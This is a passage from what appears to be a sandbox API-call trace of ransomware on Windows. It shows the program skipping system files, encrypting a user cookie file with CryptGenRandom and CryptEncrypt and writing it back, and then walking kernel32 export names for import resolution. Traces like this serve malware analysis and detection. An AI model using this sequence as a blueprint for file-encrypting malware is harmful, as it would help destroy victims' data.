lpString2="desktop.ini") returned -1 [0079.435] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt", lpString2="ntuser.dat") returned -1 [0079.435] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt", lpString2="iconcache.db") returned -1 [0079.436] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt", lpString2="bootsect.bak") returned -1 [0079.436] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt", lpString2="ntuser.dat.log") returned -1 [0079.436] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt", lpString2="thumbs.db") returned -1 [0079.436] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt", lpString2="Bootfont.bin") returned -1 [0079.436] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@google[4].txt") returned 34 [0079.436] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.436] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.436] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.436] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.436] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.436] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@google[4].txt") returned 34 [0079.436] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.436] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@google[4].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt" [0079.436] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.436] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[4].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.436] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=543) returned 1 [0079.437] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.437] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.437] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.437] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.437] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.437] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.438] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.438] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.438] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.439] CloseHandle (hObject=0x464) returned 1 [0079.439] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.439] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.440] CloseHandle (hObject=0x0) returned 0 [0079.440] CloseHandle (hObject=0x460) returned 1 [0079.440] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.441] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.441] GetTickCount () returned 0x114c5a0 [0079.441] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.441] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.441] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.441] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.442] lstrlenA (lpString="kernel32.dll") returned 12 [0079.442] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.442] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.442] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.442] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.442] lstrlenA (lpString="ADDATOMA") returned 8 [0079.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.442] lstrlenA (lpString="ADDATOMW") returned 8 [0079.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.442] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.442] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.442] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.442] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.442] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.443] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.443] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.443] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.443] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.443] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.443] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.443] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.443] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.443] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.443] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.443] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.443] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.443] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.443] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.443] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.443] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.443] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.443] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.444] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.444] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.444] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.444] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.444] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.444] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.444] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.444] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.444] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.444] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.444] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.444] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.444] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.444] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.444] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.444] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.444] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.444] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.445] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.445] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.445] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.445] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.445] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.445] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.445] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.445] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.445] lstrlenA (lpString="BEEP") returned 4 [0079.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.445] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.445] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.445] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.445] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.445] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.445] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.445] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.445] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.445] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.446] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.446] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.446] lstrlenA (lpString="CANCELIO") returned 8 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.446] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.446] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.446] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.446] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.446] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.446] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.446] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.446] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.446] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.446] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.446] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.446] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.446] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.446] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.446] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.447] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.447] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.447] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.447] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.447] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.447] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.447] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.447] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.447] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.447] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.447] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.447] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.447] 